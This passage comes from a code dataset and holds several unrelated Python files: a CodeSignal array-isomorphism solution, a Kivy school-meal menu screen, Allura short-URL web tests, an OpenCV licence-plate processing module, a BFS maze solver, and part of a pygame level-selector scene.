Solution 3\ndef areIsomorphic3(array1:list, array2:list)-> bool:\n return list(map(len, array1)) == list(map(len, array2))\n\n\na1 = [[1,1,1],[0,0]]\na2 = [[2,1,1],[2,1]]\nr1 = areIsomorphic3(a1, a2)\nprint(r1)\n\na1 = [[2],[0,0]]\na2 = [[2],[1]]\nr1 = areIsomorphic3(a1, a2)\nprint(r1)\n\na1 = [[2],[0,0]]\na2 = [[2]]\nr1 = areIsomorphic3(a1, a2)\nprint(r1)","repo_name":"Vagacoder/Codesignal","sub_path":"python/Arcade/Core/C99AreIsomorphic.py","file_name":"C99AreIsomorphic.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25079118301","text":"#= main_screen =>\nfrom kivymd.app import MDApp\nfrom kivy.clock import Clock, mainthread\nfrom kivy.properties import ObjectProperty, NumericProperty\nfrom kivymd.uix.screen import MDScreen\n\nfrom datetime import datetime, timedelta\nimport threading\n\nfrom database_helpers import get_from_database\nfrom waiter.dataclasses import eAsistentMeal\nfrom waiter.helpers import get_selected, get_monday\n\n\nclass MainScreen(MDScreen):\n \"\"\"Main Screen Class\"\"\"\n date_of_menu = ObjectProperty() # DateTime | displayed date\n meals_back_week = ObjectProperty() # Array | meals for the previous week\n meals_curr_week = ObjectProperty() # Array | meals for the current week\n meals_next_week = ObjectProperty() # Array | meals for the following week\n curr_week_num = NumericProperty() # Integer | num of current week\n\n def __init__(self, **kwargs):\n \"\"\"When Component Initialized\"\"\"\n super().__init__(**kwargs)\n app = MDApp.get_running_app()\n date_today = datetime.now()\n\n self.date_of_menu = date_today\n if self.date_of_menu.strftime(\"%w\") == \"6\": # if day is saturday (no meals)\n self.date_of_menu += timedelta(days=2)\n elif self.date_of_menu.strftime(\"%w\") == \"0\": # if day is sunday (no meals)\n self.date_of_menu += timedelta(days=1)\n\n loading_card = [\n {\n \"text\": \"Loading\",\n \"secondary_text\": \"\",\n \"icon\": \"all-inclusive\",\n \"meal_id\": \"000000\",\n \"selected\": False,\n }\n ]\n self.meals_curr_week = [loading_card for i in range(5)]\n self.create_cards()\n\n if app.logged_in:\n threading.Thread(target=self.get_weekly_data).start()\n\n def on_enter(self):\n \"\"\"When Entering Screen\"\"\"\n app = MDApp.get_running_app()\n if not app.logged_in:\n app.show_dialog(\"Error\", \"Please login!\")\n return\n\n def clear_screen(self):\n \"\"\"Clears Screen\"\"\"\n self.meals_curr_week = [[] for i in range(5)]\n self.meals_back_week = [[] for i in range(5)]\n self.meals_next_week = [[] for i in range(5)]\n self.create_cards()\n\n def get_weekly_data(self):\n \"\"\"Prepares Shown Data\"\"\"\n app = MDApp.get_running_app()\n week_num = int(\n str((get_monday(self.date_of_menu) - app.first_week_school) / 7).split(\" \")[0]\n )\n monday = get_monday(self.date_of_menu)\n\n curr_meals = app.waiter.api.get_meal_data(\n week_num, monday, app.meals\n )\n self.meals_curr_week = self.get_meals(curr_meals)\n next_meals = app.waiter.api.get_meal_data(\n week_num + 1, monday + timedelta(days=7), app.meals\n )\n self.meals_next_week = self.get_meals(next_meals)\n back_meals = app.waiter.api.get_meal_data(\n week_num - 1, monday - timedelta(days=7), app.meals\n )\n self.meals_back_week = self.get_meals(back_meals)\n\n def set_date(*args):\n app.root.ids.main.ids.date_label.text = str(\n self.date_of_menu.strftime(\"%d. %b. %y\")\n )\n Clock.schedule_once(set_date)\n self.create_cards()\n\n def get_meals(self, meals):\n \"\"\"Reformats Fetched Data\"\"\"\n app = MDApp.get_running_app()\n selected_meals = get_selected(meals)\n week_meals = []\n for i in range(5): # each day\n day_meals = []\n tracker = 1\n for meal in meals[i]: # each meal\n if not meal.meal_text:\n no_data = {\n \"text\": \"No Data\",\n \"secondary_text\": \"\",\n \"icon\": \"alert-circle-outline\",\n \"meal_id\": \"000000\",\n \"selected\": False,\n \"changable\": False,\n }\n day_meals = [no_data]\n break\n meal_data = {\n \"text\": meal.meal_text,\n \"secondary_text\": f\"meni {tracker}\",\n \"icon\": app.meals[meal.meal_id],\n \"selected\": meal.selected,\n \"meal_id\": meal.meal_id,\n \"changable\": meal.changable,\n }\n day_meals.append(meal_data)\n tracker += 1\n week_meals.append(day_meals)\n\n return week_meals\n\n @mainthread\n def create_cards(self):\n \"\"\"Populates RecycleView\"\"\"\n self.ids.recycle_view.data = self.meals_curr_week[\n int(self.date_of_menu.strftime(\"%w\")) - 1\n ]\n\n def set_next_week(self, date, *args):\n \"\"\"Switches Weeks\"\"\"\n app = MDApp.get_running_app()\n week_num = int(str((get_monday(date) - app.first_week_school) / 7).split(\" \")[0])\n next_meals = app.waiter.api.get_meal_data(week_num, get_monday(date), app.meals)\n self.meals_next_week = self.get_meals(next_meals)\n\n def set_prev_week(self, date, *args):\n \"\"\"Switches Weeks\"\"\"\n app = MDApp.get_running_app()\n week_num = int(str((get_monday(date) - app.first_week_school) / 7).split(\" \")[0])\n back_meals = app.waiter.api.get_meal_data(week_num, get_monday(date), app.meals)\n self.meals_back_week = self.get_meals(back_meals)\n\n def date_forward(self):\n \"\"\"Toggles Date Forwards\"\"\"\n \"\"\"\n if friday => switches weeks\n if weekend => sets date to next monday\n \"\"\"\n app = MDApp.get_running_app()\n if self.date_of_menu.strftime(\"%w\") == \"5\":\n self.meals_back_week = self.meals_curr_week\n self.meals_curr_week = self.meals_next_week\n threading.Thread(\n target=self.set_next_week, args=(self.date_of_menu + timedelta(days=8),)\n ).start()\n\n self.date_of_menu += timedelta(days=1)\n if self.date_of_menu.strftime(\"%w\") == \"6\":\n self.date_of_menu += timedelta(days=2)\n elif self.date_of_menu.strftime(\"%w\") == \"0\":\n self.date_of_menu += timedelta(days=1)\n app.root.ids.main.ids.date_label.text = str(\n self.date_of_menu.strftime(\"%d. %b. %y\")\n )\n self.create_cards()\n\n def date_backward(self):\n \"\"\"Toggles Date Backwards\"\"\"\n \"\"\"\n if monday => switches weeks\n if weekend => sets date to last friday\n \"\"\"\n app = MDApp.get_running_app()\n if self.date_of_menu.strftime(\"%w\") == \"1\":\n self.meals_next_week = self.meals_curr_week\n self.meals_curr_week = self.meals_back_week\n threading.Thread(\n target=self.set_prev_week,\n args=(self.date_of_menu - timedelta(days=10),),\n ).start()\n\n self.date_of_menu -= timedelta(days=1)\n if self.date_of_menu.strftime(\"%w\") == \"6\":\n self.date_of_menu -= timedelta(days=1)\n elif self.date_of_menu.strftime(\"%w\") == \"0\":\n self.date_of_menu -= timedelta(days=2)\n app.root.ids.main.ids.date_label.text = str(\n self.date_of_menu.strftime(\"%d. %b. %y\")\n )\n self.create_cards()\n","repo_name":"5KRC1/eAmenu","sub_path":"libs/screens/main_screen/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2906061622","text":"import pylons\npylons.c = pylons.tmpl_context\nfrom pylons import c\nfrom allura.tests import decorators as td\nfrom alluratest.controller import TestController\n\nfrom forgeshorturl.model import ShortUrl\n\n\nclass TestRootController(TestController):\n def setUp(self):\n super(TestRootController, self).setUp()\n self.setup_with_tools()\n\n @td.with_url\n def setup_with_tools(self):\n pass\n\n def test_shorturl_add(self):\n response = self.app.get('/admin/url/add')\n response.form['short_url'] = 'test'\n response.form['full_url'] = 'http://www.google.com/'\n response.form.submit()\n redirected = self.app.get('/url/test').follow()\n assert redirected.request.url == 'http://www.google.com/'\n\n def test_shorturl_update(self):\n response = self.app.get('/admin/url/add')\n response.form['short_url'] = 'g'\n response.form['full_url'] = 'http://www.google.com/'\n response.form.submit()\n redirected = self.app.get('/url/g').follow()\n assert redirected.request.url == 'http://www.google.com/'\n\n response = self.app.get('/url/')\n form = response.forms['update-short-url-form']\n form['short_url'] = 'g'\n form['full_url'] = 'http://www.yahoo.com/'\n form.action = '/admin/url/add/'\n form.submit()\n redirected = self.app.get('/url/g').follow()\n assert redirected.request.url == 'http://www.yahoo.com/'\n\n def test_shorturl_not_found(self):\n self.app.post('/admin/url/add',\n dict(short_url='test',\n full_url='http://www.google.com/',\n description=\"description2\"))\n r = self.app.get('/url/test2', status=404)\n r = self.app.get('/url/')\n assert 'http://www.google.com/' in r\n\n def test_shorturl_private(self):\n self.app.post('/admin/url/add',\n dict(short_url='test_private',\n full_url='http://www.amazone.com/',\n private='on',\n description=\"description1\"))\n r = self.app.get('/url/')\n assert 'http://www.amazone.com/' in r\n assert 'yes' in r\n self.app.get('/url/test_private',\n extra_environ=dict(username='*anonymous'),\n status=404)\n self.app.get('/url/test_private',\n status=302)\n\n def test_shorturl_errors(self):\n d = dict(short_url='amazone',\n full_url='amazone')\n r = self.app.post('/admin/url/add', params=d)\n assert 'error' in self.webflash(r)\n d = dict(short_url='test', full_url='http://google.com/')\n r = self.app.post('/admin/url/add', params=d)\n d['full_url'] = 'http://yahoo.com'\n r = self.app.post('/admin/url/add', params=d)\n assert 'exists' in self.webflash(r)\n\n def test_shorturl_remove(self):\n self.app.post('/admin/url/add',\n params=dict(short_url='g', full_url='http://google.com/'))\n assert ShortUrl.query.find(app_config_id=c.app.config._id).count() == 1\n self.app.post('/admin/url/remove', params=dict(shorturl='g'))\n assert ShortUrl.query.find(app_config_id=c.app.config._id).count() == 0\n\n def test_shorturl_permissions(self):\n self.app.post('/admin/url/add',\n params=dict(short_url='g', full_url='http://google.com/'),\n extra_environ=dict(username='test-user'), status=403)\n self.app.post('/admin/url/remove', params=dict(shorturl='g'),\n extra_environ=dict(username='test-user'), status=403)\n","repo_name":"Bitergia/allura","sub_path":"ForgeShortUrl/forgeshorturl/tests/functional/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11119799083","text":"import cv2\nimport numpy as np\nimport scipy.fftpack\n\ndef percentage_pixel(img):\n\twhite = np.sum(img == 255)\n\tblack = np.sum(img == 0)\n\treturn (white/(white + black)) * 100\n\t\n# Color identification of the number plate using K means clustering\ndef get_color(img):\n\thsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n\n\tmaskyellow = cv2.inRange(hsv, np.array([20,100,100],dtype = np.uint8), np.array([30,255,255], dtype = np.uint8))\n\tperyellow = percentage_pixel(maskyellow)\n\n\tmaskwhite = cv2.inRange(hsv, np.array([0,0,168],dtype = np.uint8), np.array([172,111,255], dtype = np.uint8))\n\tperwhite = percentage_pixel(maskwhite)\n\n\tnumberplate = {peryellow:'COMMERICIAL',perwhite:'PRIVATE'}\n\n\tif max(perwhite,peryellow) < 30:\n\t\treturn 'OTHER'\n\telse:\n\t\treturn sorted(numberplate.items(), key = lambda x: x[0], reverse = True)[0][1]\n\ndef rotate(olist, rot):\n\tolistnew = []\n\tfor element in olist:\n\t\tx,y,c = element[0], element[1], element[2]\n\t\ttemplist = np.array([[element[0]], [element[1]]])\n\t\ttemplist = np.matmul(rot, templist)\n\t\tx = templist[0][0]\n\t\ty = templist[1][0]\n\t\tolistnew = olistnew + [(x,y,c)]\n\treturn olistnew\n\ndef findstring(elements, threshold):\n\telements.sort(key = lambda x: x[1])\n\tupper = ''\n\tlower = ''\n\tsd = 0\n\tif abs(elements[0][1] - elements[-1][1]) < threshold:\n\t\tprint('Single Line Case')\n\t\tsd = 0\n\telse:\n\t\tprint('Double Line Case')\n\t\tsd = 1\n\tif sd == 0:\n\t\telements.sort(key = lambda x: x[0])\n\t\tfor element in elements:\n\t\t\tupper = upper + element[2]\n\t\treturn upper\n\telse:\n\t\tav = (elements[0][1] + elements[-1][1])/2\n\t\telements.sort(key = lambda x: x[0])\n\t\t\n\t\t#print(av)\n\t\t#print(elements)\n\t\tfor element in elements:\n\t\t\t#print(element[1])\n\t\t\tif element[1] < av:\n\t\t\t\tupper = upper + element[2]\n\t\t\telse:\n\t\t\t\tlower = lower + element[2]\n\t\treturn upper + lower\n\ndef plate_to_string(x_c, y_c, line, line_thresh):\n\tolist = list(zip(x_c, y_c, line))\n\tolist.sort(key = lambda x:x[0])\n\tif len(olist) > 1:\n\t\tif olist[0][1] < olist[1][1]:\n\t\t\tx_1 = olist[1][0]\n\t\t\ty_1 = olist[1][1]\n\t\telse:\n\t\t\tx_1 = olist[0][0]\n\t\t\ty_1 = olist[0][1]\n\t\tif olist[-1][1] < olist[-2][1]:\n\t\t\tx_2 = olist[-2][0]\n\t\t\ty_2 = olist[-2][1]\n\t\telse:\n\t\t\tx_2 = olist[-1][0]\n\t\t\ty_2 = olist[-1][1]\n\t\tif x_2 - x_1 != 0:\t\n\t\t\ttheta = np.arctan((y_1 - y_2)/(x_2 - x_1))\n\t\t\trot = np.array([[np.cos(theta), -np.sin(theta)],[np.sin(theta), np.cos(theta)]])\n\t\t\tolistnew = rotate(olist, rot)\n\t\t\tolistnew.sort(key = lambda x: x[0])\n\t\t\tplate = findstring(olistnew, threshold = line_thresh)\n\t\t\tprint('Plate = ',plate)\n\t\t\treturn plate\n\t\telse:\n\t\t\treturn \" \"\n\telse:\n\t\treturn \" \"\n\ndef padder(h,w,im):\n\tblack = np.zeros((h,w,3),dtype=np.uint8)\n\tim_h,im_w = im.shape[0] , im.shape[1]\n\tblack[:im_h,:im_w,:] = im\n\treturn black\n\ndef imclearborder(imgBW, radius):\n\n # Given a black and white image, first find all of its contours\n imgBWcopy = imgBW.copy()\n if (int(cv2.__version__[0]) < 4):\n im,contours,hierarchy = cv2.findContours(imgBWcopy.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n else:\n contours,hierarchy = cv2.findContours(imgBWcopy.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE) \n \n\n # Get dimensions of image\n imgRows = imgBW.shape[0]\n imgCols = imgBW.shape[1] \n\n contourList = [] # ID list of contours that touch the border\n\n # For each contour...\n for idx in np.arange(len(contours)):\n # Get the i'th contour\n cnt = contours[idx]\n\n # Look at each point in the contour\n for pt in cnt:\n rowCnt = pt[0][1]\n colCnt = pt[0][0]\n\n # If this is within the radius of the border\n # this contour goes bye bye!\n check1 = (rowCnt >= 0 and rowCnt < radius) or (rowCnt >= imgRows-1-radius and rowCnt < imgRows)\n check2 = (colCnt >= 0 and colCnt < radius) or (colCnt >= imgCols-1-radius and colCnt < imgCols)\n\n if check1 or check2:\n contourList.append(idx)\n break\n\n for idx in contourList:\n cv2.drawContours(imgBWcopy, contours, idx, (0,0,0), -1)\n\n return imgBWcopy\n\n\ndef bwareaopen(imgBW, areaPixels):\n # Given a black and white image, first find all of its contours\n imgBWcopy = imgBW.copy()\n\n if (int(cv2.__version__[0]) < 4):\t\n im,contours,hierarchy = cv2.findContours(imgBWcopy.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n else:\n contours,hierarchy = cv2.findContours(imgBWcopy.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n \n\n # For each contour, determine its total occupying area\n for idx in np.arange(len(contours)):\n area = cv2.contourArea(contours[idx])\n if (area >= 0 and area <= areaPixels):\n cv2.drawContours(imgBWcopy, contours, idx, (0,0,0), -1)\n\n return imgBWcopy\n\n\n\ndef find_boxes(thresh, drawplates, maxareathresh, minareathresh):\n\ttotal, labels, boxes, centroids = cv2.connectedComponentsWithStats(thresh, 8, cv2.CV_32S)\n\tif total > 1:\n\t\tif drawplates:\n\t\t\tthresh = cv2.cvtColor(thresh, cv2.COLOR_GRAY2BGR)\n\t\tcc = []\n\t\tcentroid = []\n\t\ti = 0\n\t\twhile(i < total):\n\t\t\tx1 = int(boxes[i][0])\n\t\t\ty1 = int(boxes[i][1])\n\t\t\tx2 = x1 + int(boxes[i][2])\n\t\t\ty2 = y1 + int(boxes[i][3])\n\t\t\tif boxes[i][4] < maxareathresh and minareathresh < boxes[i][4]:\n\t\t\t\t#cc = np.append(cc, np.array([[x1,y1,x2,y2]]), axis = 0)\n\t\t\t\tcc = cc + [thresh[y1:y2,x1:x2]]\n\t\t\t\tcentroid = centroid + [(x1 + x2)/2]\n\t\t\t\tif drawplates:\n\t\t\t\t\tcv2.rectangle(thresh, (x1, y1), (x2, y2), (0,0,255), 1)\t\n\t\t\ti = i + 1\n\t\tidx = np.argsort(centroid)\n\t\tcc = np.array(cc)[idx]\n\t\t#centroid = np.array(centroid)[idx]\n\t\treturn thresh, cc\n\telse:\n\t\treturn thresh, np.empty((0,4))\n\ndef find_coordinates(img, boxes):\n width = img.shape[1]\n height = img.shape[0]\n \n for i in range(len(boxes)):\n box = boxes[i]\n x1 = abs(int((box[0] - box[2] / 2.0) * width))\n y1 = abs(int((box[1] - box[3] / 2.0) * height))\n x2 = int((box[0] + box[2] / 2.0) * width)\n y2 = int((box[1] + box[3] / 2.0) * height)\n return x1, y1, x2, y2\n\n\ndef order_points(pts):\n\n\trect = np.zeros((4, 2), dtype = \"float32\")\n\n\ts = pts.sum(axis = 1)\n\trect[0] = pts[np.argmin(s)]\n\trect[2] = pts[np.argmax(s)]\n \n\n\tdiff = np.diff(pts, axis = 1)\n\trect[1] = pts[np.argmin(diff)]\n\trect[3] = pts[np.argmax(diff)]\n \n\t# return the ordered coordinates\n\treturn rect\n\n\ndef four_point_transform(image, pts):\n\n\trect = order_points(pts)\n\t(tl, tr, br, bl) = rect\n\n\twidthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n\twidthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n\tmaxWidth = max(int(widthA), int(widthB))\n \n\n\theightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n\theightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n\tmaxHeight = max(int(heightA), int(heightB))\n\n\tdst = np.array([\n\t\t[0, 0],\n\t\t[maxWidth - 1, 0],\n\t\t[maxWidth - 1, maxHeight - 1],\n\t\t[0, maxHeight - 1]], dtype = \"float32\")\n \n\t# compute the perspective transform matrix and then apply it\n\tM = cv2.getPerspectiveTransform(rect, dst)\n\twarped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\n \n\t# return the warped image\n\treturn warped\n\n\n\ndef plate_detect(frame, boxes, drawplates, maxareathresh, minareathresh):\n\trf = 1\n\t#kernel = np.ones((5,5),np.uint8)\n\tkernel = np.array([[1,2,1],[2,4,2],[1,2,1]], dtype = np.uint8)/16\n\n\tx1, y1, x2, y2 = find_coordinates(frame, boxes)\n\tif x1 == 0 and x2 == 0 and y1 == 0 and y2 == 0:\n\t\tx2, y2 = 1, 1\n\t\n\timg = frame[y1:y2,x1:x2]\n\talphanumerics = []\n\tIclear = np.zeros((10,10))\n\tIopen = np.zeros((10,10))\n\timggray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\t#clahe = cv2.createCLAHE(clipLimit = 2.0, tileGridSize = (8,8))\n\tsh = imggray.shape\n\n\t#original = cv2.resize(original,(sh[1],sh[0]))\n\t#Image enhancement using morphological transformation\n\tret,thresh = cv2.threshold(imggray,60,255,0)\n\tthresh = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel)\n\n\t#Contour detection for detecting the number plate area\n\tif (int(cv2.__version__[0]) < 4):\n\t\tx, contours, hierarchy = cv2.findContours(thresh, 1, 2)\n\telse:\n\t\tcontours, hierarchy = cv2.findContours(thresh, 1, 2)\n\t\t\n\tif len(contours) >0:\n\n\t\tc = max(contours, key=cv2.contourArea)\n\t\textLeft = tuple(c[c[:, :, 0].argmin()][0])\n\t\textRight = tuple(c[c[:, :, 0].argmax()][0])\n\t\textTop = tuple(c[c[:, :, 1].argmin()][0])\n\t\textBot = tuple(c[c[:, :, 1].argmax()][0])\n\t\trect = cv2.minAreaRect(c)\n\t\tpts11 = cv2.boxPoints(rect)\n\t\tbox = np.int0(pts11)*rf\n\t\tp1,p2,p3,p4 = box\n\n\t\tpts = np.array([p1, p2, p3, p4], dtype = \"float32\")\n\n\n\t\tplate = four_point_transform(img,pts)\n\t\t\n\t\timgg = cv2.cvtColor(plate, cv2.COLOR_BGR2GRAY)\n\t\t\n\t\trows = imgg.shape[0]\n\t\tcols = imgg.shape[1]\n\t\t\n\t\timgLog = np.log1p(np.array(imgg, dtype=\"float\") / 255)\n\n\t\t# Create Gaussian mask of sigma = 10\n\t\tM = 2*rows + 1\n\t\tN = 2*cols + 1\n\t\tsigma = 5\n\t\t(X,Y) = np.meshgrid(np.linspace(0,N-1,N), np.linspace(0,M-1,M))\n\t\tcenterX = np.ceil(N/2)\n\t\tcenterY = np.ceil(M/2)\n\t\tgaussianNumerator = (X - centerX)**2 + (Y - centerY)**2\n\n\t\t# Low pass and high pass filters\n\t\tHlow = np.exp(-gaussianNumerator / (2*sigma*sigma))\n\t\tHhigh = 1 - Hlow\n\n\t\t# Move origin of filters so that it's at the top left corner to\n\t\t# match with the input image\n\t\tHlowShift = scipy.fftpack.ifftshift(Hlow.copy())\n\t\tHhighShift = scipy.fftpack.ifftshift(Hhigh.copy())\n\n\t\t# Filter the image and crop\n\t\tIf = scipy.fftpack.fft2(imgLog.copy(), (M,N))\n\t\tIoutlow = scipy.real(scipy.fftpack.ifft2(If.copy() * HlowShift, (M,N)))\n\t\tIouthigh = scipy.real(scipy.fftpack.ifft2(If.copy() * HhighShift, (M,N)))\n\n\t\t# Set scaling factors and add\n\n\t\tgamma1 = 0.3 #0.3\n\t\tgamma2 = 1.5 #1.5\n\t\tIout = gamma1*Ioutlow[0:rows,0:cols] + gamma2*Iouthigh[0:rows,0:cols]\n\n\t\t# Anti-log then rescale to [0,1]\n\t\tIhmf = np.expm1(Iout)\n\t\tIhmf = (Ihmf - np.min(Ihmf)) / (np.max(Ihmf) - np.min(Ihmf))\n\t\tIhmf2 = np.array(255*Ihmf, dtype=\"uint8\")\n\n\t\t# Threshold the image - Anything below intensity 65 gets set to white\n\t\tIthresh = Ihmf2 < 80\n\t\tIthresh = 255*Ithresh.astype(\"uint8\")\n\n\t\t# Clear off the border. Choose a border radius of 5 pixels\n\t\tIclear = imclearborder(Ithresh, 5) #5\n\t\t#cv2.imshow('Cleaned Plate',Iclear)\n\t\t#Iclear = Ithresh\n\t\t# Eliminate regions that have areas below 40 pixels\n\n\t\tthresh = bwareaopen(Iclear, 40) #60\n\t\t\n\t\t#ret, thresh = cv2.threshold(imgg, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n\t\t#thresh = cv2.medianBlur(thresh, 3)\n\t\t#thresh = cv2.bilateralFilter(thresh, 15, 75, 75)\n\t\t\n\t\tthresh, digitbox = find_boxes(thresh, drawplates, maxareathresh, minareathresh)\n\t\t\n\n\treturn thresh, digitbox\n\t\n#cap = cv2.VideoCapture('/home/arihant/Downloads/1.mp4')\n\n#locfile = open('/home/arihant/sih_number_plate-master1/locations.txt','r')\n\n#coor = locfile.readline()\n\n","repo_name":"conspicio-ai/alpr","sub_path":"pytorch-YOLOv4/tool/plateprocessing.py","file_name":"plateprocessing.py","file_ext":"py","file_size_in_byte":10555,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"42814315262","text":"# -*- coding: utf-8 -*-\n\"\"\"미로 탐색\n\nN×M크기의 배열로 표현되는 미로가 있다.\n\n1\t0\t1\t1\t1\t1\n1\t0\t1\t0\t1\t0\n1\t0\t1\t0\t1\t1\n1\t1\t1\t0\t1\t1\n미로에서 1은 이동할 수 있는 칸을 나타내고, 0은 이동할 수 없는 칸을 나타낸다. 이러한 미로가 주어졌을 때,\n(1, 1)에서 출발하여 (N, M)의 위치로 이동할 때 지나야 하는 최소의 칸 수를 구하는 프로그램을 작성하시오.\n한 칸에서 다른 칸으로 이동할 때, 서로 인접한 칸으로만 이동할 수 있다.\n\n위의 예에서는 15칸을 지나야 (N, M)의 위치로 이동할 수 있다. 칸을 셀 때에는 시작 위치와 도착 위치도 포함한다.\n\n첫째 줄에 두 정수 N, M(2 ≤ N, M ≤ 100)이 주어진다.\n다음 N개의 줄에는 M개의 정수로 미로가 주어진다. 각각의 수들은 붙어서 입력으로 주어진다.\n\n첫째 줄에 지나야 하는 최소의 칸 수를 출력한다. 항상 도착위치로 이동할 수 있는 경우만 입력으로 주어진다.\n\"\"\"\nfrom collections import deque\n\ndx = (1, 0, -1, 0)\ndy = (0, -1, 0, 1)\n\nn, m = map(int, input().split())\n\nboard = [input() for _ in range(n)]\n\n\ndef is_valid_coord(y, x):\n return 0 <= y < n and 0 <= x < m\n\n\ndef bfs(sy, sx):\n check = [[0] * m for _ in range(n)]\n check[sy][sx] = 1\n q = deque()\n q.append((sy, sx))\n\n while q:\n y, x = q.popleft()\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n\n if is_valid_coord(ny, nx) and board[ny][nx] == '1' and check[ny][nx] == 0:\n check[ny][nx] = check[y][x] + 1\n q.append((ny, nx))\n return check\n\n\nprint(bfs(0, 0)[n - 1][m - 1])\n","repo_name":"hodoodang/legendary-guacamole","sub_path":"BOJ/2178.py","file_name":"2178.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69832601709","text":"from game.scenes.scene import Scene\n\nfrom game.objects.enemys.koishi_komeiji import KoishiKomeiji\nfrom game.objects.enemys.yukari_yakumo import YukariYakumo\n\nimport pygame\nchapthers = [\n {\n \"name\" : \"The Lost sin in the dark wood\",\n \"enemys\": [KoishiKomeiji],\n \"background\": \"dark-wood\",\n \"music\": \"game-1\",\n \"hp\": 5,\n \"time\": 60,\n \"max_hp\": 5\n },{\n \"name\" : \"The Battle At Temple\",\n \"enemys\": [YukariYakumo],\n \"background\": \"temple\",\n \"music\": \"yukari\",\n \"hp\": 5,\n \"time\": 90,\n \"max_hp\": 5\n },{\n \"name\" : \"The Battle At Temple(Day)\",\n \"enemys\": [YukariYakumo,KoishiKomeiji],\n \"background\": \"temple_day\",\n \"music\": \"yukari\",\n \"hp\": 5,\n \"time\": 120,\n \"max_hp\": 5\n },{\n \"name\" : \"The Full Moon Night\",\n \"enemys\": [KoishiKomeiji,YukariYakumo],\n \"background\": \"red-moon\",\n \"music\": \"yukari\",\n \"hp\": 5,\n \"time\": 120,\n \"max_hp\": 5\n }\n]\n\nclass ChaptherSelectorScene(Scene):\n def __init__(self, engine):\n super().__init__(engine)\n self.tick = 0\n self.current_chapther = 0\n self.current_music = None\n def init(self):\n self.engine.music.play('intro')\n\n for i,chapther in enumerate(chapthers):\n scale_factor = 30\n sprite = self.engine.sprites[chapther[\"background\"]]\n small_image = pygame.transform.smoothscale(sprite[\"image\"], (sprite[\"rect\"].width // scale_factor, sprite[\"rect\"].height // scale_factor))\n chapther[\"background-blurred\"] = pygame.transform.smoothscale(small_image, (self.engine.WIDTH, self.engine.HEIGHT))\n chapther[\"background-resized\"] = pygame.transform.scale(sprite[\"image\"], (self.engine.WIDTH * 0.4, self.engine.HEIGHT * 0.6))\n \n chapther[\"offset_x_target\"] = 0\n if i < self.current_chapther:\n chapther[\"offset_x_target\"] = -self.engine.WIDTH\n elif i > self.current_chapther:\n chapther[\"offset_x_target\"] = self.engine.WIDTH + self.engine.HALF_WIDTH\n chapther[\"offset_x\"] = chapther[\"offset_x_target\"]\n \n return;\n def draw_chapther(self, screen, chapther):\n offset_x = chapther[\"offset_x\"]\n detail = f\"\"\"Level Detail\nenemys: {len(chapther[\"enemys\"])}\nhp: {chapther[\"hp\"]}\nmax_hp: {chapther[\"max_hp\"]}\n\"\"\"\n screen.blit(chapther[\"background-resized\"], ((self.engine.WIDTH*0.1)+ offset_x,self.engine.HEIGHT*0.2))\n screen.draw.text(chapther[\"name\"], topleft=((self.engine.WIDTH*0.53)+ offset_x, self.engine.HEIGHT*0.2), fontsize=48, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.draw.text(\"Max Time:\", bottomleft=((self.engine.WIDTH*0.52)+ offset_x, self.engine.HEIGHT*0.56), fontsize=72, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.draw.text(str(chapther[\"time\"]) + \" Seconds\", bottomleft=((self.engine.WIDTH*0.52)+ offset_x, self.engine.HEIGHT*0.65), fontsize=82, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.draw.text(\"Higest Score:\", bottomleft=((self.engine.WIDTH*0.52)+ offset_x, self.engine.HEIGHT*0.73), fontsize=72, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.draw.text((str(chapther[\"higest_score\"] if \"higest_score\" in chapther else 0)).zfill(12), bottomleft=((self.engine.WIDTH*0.52)+ offset_x, self.engine.HEIGHT*0.82), fontsize=82, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.draw.text(detail, topleft=((self.engine.WIDTH*0.53)+ offset_x, self.engine.HEIGHT*0.25), fontsize=32, color=\"white\", owidth=2, ocolor=(39,18,77))\n def draw(self, screen):\n screen.blit(chapthers[self.current_chapther][\"background-blurred\"], (0,0))\n self.draw_chapther(screen,chapthers[self.current_chapther])\n if self.current_chapther > 0: self.draw_chapther(screen,chapthers[self.current_chapther-1])\n if self.current_chapther < len(chapthers) - 1: self.draw_chapther(screen,chapthers[self.current_chapther+1])\n screen.draw.text(\"LEVEL SELECTOR\", center=(self.engine.HALF_WIDTH, self.engine.HEIGHT * 0.1), fontsize=62, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.blit('arrow_left', (0,self.engine.HALF_HEIGHT - 36))\n screen.blit('arrow_right', (self.engine.WIDTH * 0.95,self.engine.HALF_HEIGHT - 36))\n if self.tick // 24 % 2 == 0:\n screen.draw.text(\"Press Enter to start the game!\", 